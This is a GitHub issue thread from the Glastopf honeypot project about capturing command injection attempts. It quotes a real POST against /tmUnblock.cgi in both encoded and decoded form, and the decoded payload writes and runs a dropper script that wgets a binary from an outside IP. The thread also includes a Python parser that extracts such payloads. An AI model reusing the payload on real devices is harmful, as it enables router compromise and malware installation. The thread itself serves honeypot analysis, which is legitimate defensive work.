mushorg / glastopf

Web Application Honeypot
http://glastopf.org

Shell commands in POST not executing #193

Closed bond-alexander closed 9 years ago

bond-alexander commented 10 years ago

Over the past few days, my Glastopf instance has been seeing more command injection attempts designed to download and execute a file. However, Glastopf itself doesn't recognize the attack and doesn't try to download the payload.

Example POST:

POST /tmUnblock.cgi HTTP/1.1
Content-Length: 1036

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%32%39%65%37%38%39%62%39%20%68%74%74%70%3a%2f%2f%31%30%31%2e%37%38%2e%32%34%36%2e%31%38%37%3a%33%32%30%30%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%2e%2f%2e%32%39%65%37%38%39%62%39%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31 

Which decodes to:

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .29e789b9.sh;echo "wget -O .29e789b9 http://101.78.246.187:3200" >> .29e789b9.sh;echo "chmod +x .29e789b9" >> .29e789b9.sh;echo "./.29e789b9" >> .29e789b9.sh;echo "rm .29e789b9" >> .29e789b9.sh;chmod +x .29e789b9.sh;./.29e789b9.sh`&StartEPI=1

I see the same POST appear repeatedly, with different remote IPs (same port) and different filenames.

What can we do to get Glastopf to safely execute the code and retrieve the file?

glaslos commented 10 years ago

Generally you want to separate the bash from the parameters. Quick and dirty would be a regex for a URL/IP:Port in the parameters. If you get the full bash command, you can also execute it in Kippo.
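The two steps discussed in this thread, decoding the percent-encoded POST body from the report above and then separating the injected shell from the form parameters and pulling a URL or IP:port out of it as suggested in the reply, as one added example. This is not Glastopf or Kippo code; the function names, the regexes and the "download_and_execute" verdict are my own choices, and the encoded body is reconstructed from the decoded form quoted in the issue rather than copied from the wire. It also handles `$(...)` substitution and `&&`/`|` separators, which go slightly beyond the single backtick case shown in the report.

```python
"""Decode a form body, isolate shell injected via command substitution, and
extract download targets the honeypot should log. Added example, not Glastopf code."""
import re
from urllib.parse import parse_qsl, quote

# Decoded parameters exactly as quoted in the issue. The attacker sent every
# byte percent-encoded, so ENCODED_BODY rebuilds that wire form (constructed).
DECODED_PARAMS = [
    ("submit_button", ""), ("change_action", ""), ("action", ""), ("commit", ""),
    ("ttcp_num", "2"), ("ttcp_size", "2"),
    ("ttcp_ip", '-h `cd /tmp;echo "#!/bin/sh" > .29e789b9.sh;'
                'echo "wget -O .29e789b9 http://101.78.246.187:3200" >> .29e789b9.sh;'
                'echo "chmod +x .29e789b9" >> .29e789b9.sh;echo "./.29e789b9" >> .29e789b9.sh;'
                'echo "rm .29e789b9" >> .29e789b9.sh;chmod +x .29e789b9.sh;./.29e789b9.sh`'),
    ("StartEPI", "1"),
]
ENCODED_BODY = "&".join(f"{quote(k, safe='')}={quote(v, safe='')}" for k, v in DECODED_PARAMS)

# Assumed patterns (mine, not the project's): command substitution, URLs, bare IP[:port],
# download tools, and execution of a freshly written file.
SUBST_RE = re.compile(r"`([^`]+)`|\$\(([^()]+)\)")
URL_RE = re.compile(r"\b(?:https?|ftp|tftp)://[^\s\"'`;|&<>]+")
HOST_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
EXEC_RE = re.compile(r"(^|\s)(\./\S+|sh\s|bash\s|chmod\s+\+x)")


def decode_form(body):
    """Percent-decode the body into ordered (name, value) pairs, keeping empty values."""
    return parse_qsl(body, keep_blank_values=True)


def extract_shell(value):
    """Shell snippets injected into one parameter via `...` or $(...)."""
    return [bt or dollar for bt, dollar in SUBST_RE.findall(value)]


def split_commands(shell):
    """Split a one-liner on ; && || | into individual commands."""
    return [c.strip() for c in re.split(r";|&&|\|\||\|", shell) if c.strip()]


def extract_targets(shell):
    """URLs first, then bare IP[:port] outside any URL, deduplicated in order."""
    urls = URL_RE.findall(shell)
    hosts = HOST_PORT_RE.findall(URL_RE.sub(" ", shell))
    seen, out = set(), []
    for target in urls + hosts:
        if target not in seen:
            seen.add(target)
            out.append(target)
    return out


def classify(commands):
    """Coarse verdict: does the injected shell fetch something, run something, or both?"""
    download = any(DOWNLOAD_RE.search(c) for c in commands)
    execute = any(EXEC_RE.search(c) for c in commands)
    if download and execute:
        return "download_and_execute"
    if download:
        return "download"
    if execute:
        return "execute"
    return "shell_injection"


def analyse_post(body):
    """One finding per parameter carrying command substitution; empty for benign bodies."""
    findings = []
    for name, value in decode_form(body):
        for shell in extract_shell(value):
            commands = split_commands(shell)
            findings.append({
                "parameter": name,
                "commands": commands,
                "targets": extract_targets(shell),
                "verdict": classify(commands),
            })
    return findings


if __name__ == "__main__":
    for finding in analyse_post(ENCODED_BODY):
        print(finding["parameter"], finding["verdict"], finding["targets"])
        for cmd in finding["commands"]:
            print("   ", cmd)
```

The targets list is what a fetcher or a Kippo hand-off would consume; keeping the whole decoded command list alongside it preserves the file names and the exact download line for the event log, even when the wget is hidden inside an `echo` that writes a dropper script.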

glaslos commented 9 years ago

Assuming this to be answered, closing the issue.